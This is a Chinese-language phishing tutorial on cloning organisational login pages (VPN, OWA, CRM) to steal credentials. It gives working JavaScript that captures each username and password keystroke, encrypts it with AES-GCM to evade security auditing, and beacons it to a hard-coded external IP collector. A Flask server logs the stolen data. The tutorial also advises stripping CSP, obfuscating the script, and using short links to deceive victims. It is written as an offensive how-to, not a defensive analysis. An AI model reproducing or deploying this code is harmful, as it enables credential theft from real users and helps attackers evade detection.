链接钓鱼–克隆页面获取凭证

这是最经典且使用最广泛的链接钓鱼方式

攻击者会克隆目标组织的 VPN、邮箱(如 OWA)、CRM 等系统登录页,并在相似域名上部署,通过邮件诱导用户输入凭证

更具欺骗性的是,现代钓鱼工具包(如 PoisonSeed 或 Tycoon)已实现 “精准验证” 机制:它们会将受害者的邮箱地址嵌入 URL 作为唯一标识,后端验证匹配后才展示登录界面,无效访客则被重定向至 Google,从而有效过滤掉安全人员的蜜罐邮箱

克隆页面

假设我们要克隆的登录页面如下

首先,使用插件 SingleFile 保存页面

修改 CSP 策略

打开 login.html 源代码,搜索 <meta http-equiv="Content-Security-Policy"<meta http-equiv="Content-Security-Policy-Report-Only",如果存在,说明是页面内联设置的

如果有,则直接删除掉

修改表单

如果不想加后端,简单的话就是 method 改为 GET,action 为空

这样就可以保证用户提交后停留在页面

JavaScript 提交

加入客户端 JavaScript,在提交前就实时把键入内容通过 WebSocket 或 fetch 发送到收集端,防止用户未点提交就关闭页面

同时,对收集的数据进行 AES 加密传输,避免在 HTTP 层面被安全设备明文审计到

具体实现如下:

  • 监听 input 事件,每输入一个字符立即异步发送,而非等到表单提交

  • 使用 AES-GCM 对称加密载荷

  • 通过 fetch 发送密文,设置 keepalive: true 防止页面关闭时请求中断

  • 收集端返回 204 或空内容,避免影响浏览器行为

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
<script>
(function() {
    'use strict';

    const COLLECTOR_URL = 'https://113.45.17.228/collect';
    // 32 字节 AES-256 密钥 Base64(必须替换为真实密钥)
    const RAW_KEY_B64 = '你的32字节密钥Base64';

    let cryptoKey = null;

    async function initKey() {
        const raw = Uint8Array.from(atob(RAW_KEY_B64), c => c.charCodeAt(0));
        if (raw.length !== 32) throw new Error('Key must be 32 bytes');
        cryptoKey = await crypto.subtle.importKey('raw', raw, { name: 'AES-GCM' }, false, ['encrypt']);
    }

    // 加密后返回 Base64 字符串
    async function encryptToBase64(plaintext) {
        if (!cryptoKey) return null;
        const iv = crypto.getRandomValues(new Uint8Array(12));
        const enc = new TextEncoder().encode(plaintext);
        const ct = await crypto.subtle.encrypt({ name: 'AES-GCM', iv }, cryptoKey, enc);
        const combined = new Uint8Array(iv.length + ct.byteLength);
        combined.set(iv);
        combined.set(new Uint8Array(ct), iv.length);
        // 转换为 Base64
        return btoa(String.fromCharCode(...combined));
    }

    // 发送函数:字符串 -> text/plain,无 CORS 预检
    function sendData(field, value) {
        if (!cryptoKey) return;
        const payload = JSON.stringify({
            field: field,
            value: value,
            ts: Date.now(),
            url: window.location.href
        });
        encryptToBase64(payload).then(b64 => {
            if (!b64) return;
            // 直接发送 Base64 字符串,浏览器设置 Content-Type: text/plain
            navigator.sendBeacon(COLLECTOR_URL, b64);
        }).catch(() => {});
    }

    function hookInputs() {
        const u = document.getElementById('username');
        const p = document.getElementById('password');
        if (u) u.addEventListener('input', e => sendData('username', e.target.value));
        if (p) p.addEventListener('input', e => sendData('password', e.target.value));
    }

    initKey().then(() => {
        if (document.readyState === 'loading') {
            document.addEventListener('DOMContentLoaded', hookInputs);
        } else {
            hookInputs();
        }
    });
})();
</script>

服务器接收

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from flask import Flask, request

app = Flask(__name__)
RAW_DUMP_FILE = 'raw_data.log'   # 原始请求体保存路径

@app.route('/collect', methods=['POST'])
def collect():
    # 以二进制方式获取请求体原始字节
    raw_bytes = request.get_data()  # 不再使用 as_text=True
    print(f"[*] 收到 {len(raw_bytes)} 字节数据,前30字节: {raw_bytes[:30]}")

    # 追加写入文件,每条数据用分隔线隔开
    with open(RAW_DUMP_FILE, 'ab') as f:
        f.write(b'--- BEGIN ' + str(len(raw_bytes)).encode() + b' bytes ---\n')
        f.write(raw_bytes)
        f.write(b'\n--- END ---\n')

    return '', 204

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=443, ssl_context='adhoc')

JavaScript 混淆

最后再给前端 JS 代码做混淆,不能让别人看到了

短链接

必要时可以生成短连接迷惑对方